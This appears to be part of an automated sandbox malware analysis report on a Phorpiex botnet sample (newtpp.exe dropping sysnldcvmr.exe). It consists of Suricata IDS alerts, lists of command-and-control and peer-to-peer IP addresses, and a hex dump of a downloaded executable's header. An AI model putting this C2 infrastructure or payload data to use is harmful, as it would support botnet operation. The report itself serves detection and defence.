                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49748 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49751 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49749 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49747 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 188.160.12.49:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49759 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 134.35.107.95:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49771 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49777 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49789 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49796 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 2.135.246.18:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49807 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49819 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49827 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 77.81.130.60:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 91.185.130.166:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49839 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49860 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 2.177.228.237:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49847 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 195.158.21.74:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49869 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49881 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49887 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 134.35.205.29:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 198.163.193.96:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 134.35.104.95:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49899 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 92.46.228.246:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49911 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49918 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49930 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49942 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 217.30.160.219:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49949 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 178.71.163.141:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 41.138.38.164:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49982 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 195.158.18.194:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49988 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 89.249.62.87:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50000 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49961 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49970 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 37.99.52.150:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50011 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50017 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 80.191.218.209:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50024 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 176.113.143.77:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50047 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50036 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50055 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50066 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 213.230.108.92:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 82.200.169.186:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50075 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 188.212.145.214:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 91.185.146.150:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 5.219.134.102:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50086 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50077 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50082 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 198.163.193.229:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50084 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 90.156.163.101:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50080 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 89.44.147.157:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50087 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50096 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50091 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50093 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50100 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50098 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 187.223.139.73:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50078 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50089 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:50094 -> 185.215.113.66:80
                  Contains functionality to check if Internet connection is working
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com0_2_0040AA80
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com1_2_0040AA80
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com2_2_0040AA80
                  Source: unknownNetwork traffic detected: IP country count 19
                  Source: global trafficTCP traffic: 192.168.2.4:49733 -> 89.249.62.7:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49742 -> 90.156.163.33:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49746 -> 178.253.102.214:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49750 -> 187.230.224.189:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49765 -> 90.156.160.43:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49783 -> 31.171.185.170:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49795 -> 5.74.223.211:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49808 -> 129.122.183.25:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49821 -> 62.212.36.229:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49836 -> 154.118.201.198:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49838 -> 185.215.113.66:5152
                  Source: global trafficTCP traffic: 192.168.2.4:49851 -> 102.215.170.62:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49863 -> 91.231.253.155:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49875 -> 59.91.192.115:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49888 -> 87.237.234.195:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49901 -> 89.249.62.92:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49917 -> 89.218.244.178:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49929 -> 80.71.213.158:40500
                  Source: global trafficTCP traffic: 192.168.2.4:49990 -> 195.158.18.194:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50006 -> 198.163.193.96:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50016 -> 62.114.143.56:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50029 -> 151.232.164.243:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50042 -> 188.124.116.191:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50054 -> 187.230.142.108:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50067 -> 2.191.61.218:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50076 -> 94.141.226.56:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50079 -> 91.185.130.166:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50081 -> 183.109.168.229:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50083 -> 189.167.57.71:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50085 -> 176.113.143.77:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50088 -> 38.166.109.33:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50090 -> 176.214.150.127:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50092 -> 189.133.187.71:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50095 -> 78.137.64.239:40500
                  Source: global trafficTCP traffic: 192.168.2.4:50099 -> 134.35.104.95:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 182.188.65.58:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 38.224.37.24:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 77.44.192.46:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 2.190.67.184:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 89.218.218.206:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 82.137.239.235:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 2.185.189.167:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 189.150.7.25:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 134.35.126.112:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 2.176.90.19:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 188.160.12.49:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 134.35.107.95:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 151.245.127.72:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 2.135.246.18:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 2.177.228.237:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 77.81.130.60:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 195.158.21.74:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 134.35.205.29:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 92.46.228.246:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 217.30.160.219:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 178.71.163.141:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 41.138.38.164:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 89.249.62.87:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 5.239.147.239:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 37.99.52.150:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 80.191.218.209:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 5.219.134.102:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 213.230.108.92:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 82.200.169.186:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 188.212.145.214:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 91.185.146.150:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 187.223.139.73:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 2.132.15.134:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 89.44.147.157:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 94.230.44.71:40500
                  Source: global trafficUDP traffic: 192.168.2.4:56186 -> 5.251.47.42:40500
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:55:20 GMTContent-Type: application/octet-streamContent-Length: 5827584Last-Modified: Fri, 27 Sep 2024 20:03:46 GMTConnection: keep-aliveETag: "66f70fa2-58ec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 58 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 22 59 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 93 01 00 00 10 00 00 00 94 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 de 56 00 00 b0 01 00 00 e0 56 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f0 39 00 00 00 90 58 00 00 3a 00 00 00 78 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 58 11 00 00 00 d0 58 00 00 12 00 00 00 b2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f4 0e 00 00 00 f0 58 00 00 10 00 00 00 c4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1c 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 20 59 00 00 0c 00 00 00 d4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 30 59 00 00 02 00 00 00 e0 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 59 00 00 02 00 00 00 e2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 50 59 00 00 04 00 00 00 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 60 59 00 00 04 00 00 00 e8 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 91.202.233.141 91.202.233.141
                  Source: Joe Sandbox ViewASN Name: KAR-TEL-ASAlmatyRepublicofKazakhstanKZ KAR-TEL-ASAlmatyRepublicofKazakhstanKZ
                  Source: Joe Sandbox ViewASN Name: PTC-YEMENNETYE PTC-YEMENNETYE
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 185.215.113.84:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49751 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49771 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49777 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49789 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49796 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49807 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49819 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49827 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49839 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49860 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49847 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49869 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49881 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49887 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49899 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49911 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49918 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49930 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49942 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49949 -> 91.202.233.141:80
